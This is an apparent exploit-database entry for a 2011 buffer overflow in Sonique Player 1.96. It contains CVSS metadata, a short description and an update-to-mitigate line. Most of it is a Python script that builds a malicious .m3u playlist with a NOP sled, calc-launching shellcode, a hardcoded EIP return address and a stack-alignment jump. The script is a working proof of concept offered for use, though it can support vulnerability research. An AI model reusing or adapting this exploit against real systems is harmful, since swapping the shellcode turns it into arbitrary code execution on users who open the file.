Sonique BOF EIP Overwrite

vendor:

Sonique Player

by:

Securityxxxpert

7.8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Sonique Player

Affected Version From: 1.96

Affected Version To: 1.96

Patch Exists: Yes

Related CWE: N/A

CPE: a:sonique:sonique_player:1.96

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2011

This exploit is for the Sonique Player application version 1.96. It is a buffer overflow exploit that overwrites the EIP with 239 bytes of data and Pita Bytes of 0x00 0x83 0x88 0x93. It is not universal and the user must find their own offsets if not using Windows XP SP3 Eng. The exploit includes 4 Nops before aligning the stack in order to align the stack properly without errors. It then creates a directory and a text file with the exploit code in it.

Mitigation:

The user should update to the latest version of the Sonique Player application.

Source

Exploit-DB raw data:

#Application: Sonique BOF EIP Overwrite
#Version:  1.96
#Author: Securityxxxpert
#Date Submitted:  May 17, 2011
#Download Link: http://www.tucows.com/preview/193562
#Tested on:  Windows XP SP3
#EIP Overwritten: 239 Bytes
#Pita Bytes:  0x00 0x83 0x88 0x93
#Notes:  Not universal, find your own offsets if not SP3 Eng
#Notes Cont:  4 Nops is added before aligning the stack in order to 
align the stack properly  without errors
#Humor: Waterbottle + Justin Bieber's Head = Pwnage
print 
"--------------------------------------------------------------------------------"
print "                                      Sonique Player 
Exploit                    "
print "                                      Retreat 
Hell!                             "
print "Greetz:  Acidgen, Subinacls, GrumpyBear, Pyoor, Corelanc0d3r, Dr. 
Nick, Rek0n   "
print "Greetz Cont: Connection, MaXe, ronin, 
Intern0t,                                  "
print "Greetz Cont:  Podjackel, g0tmi1k & The entire Corelan & Offensive 
Security Teams "
print 
"--------------------------------------------------------------------------------"
import os
filename = "waterbottle.m3u"

nopsled="\x90"*93 #Sliding to pwnage
sc=("\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0") 
#16 byte Calc Shellcode
filler = "\x90"*130
eip='\x6F\x9C\x10\x5D' #0x5D109C6F
alignjmp='\x83\xC3\x1c\x90'+'\xff\xe3' #Aligns the stack to EBX1c, then 
Jumps to EBX *EBX1C*
Junk='\x42' * 10000

exploit = nopsled + sc + filler + eip + "\x90"* 4 + alignjmp + Junk
os.makedirs ("./Justin.Beiber -My World")
os.chdir ("./Justin.Beiber -My World")
textfile = open(filename,"w")
textfile.write(exploit)
textfile.close()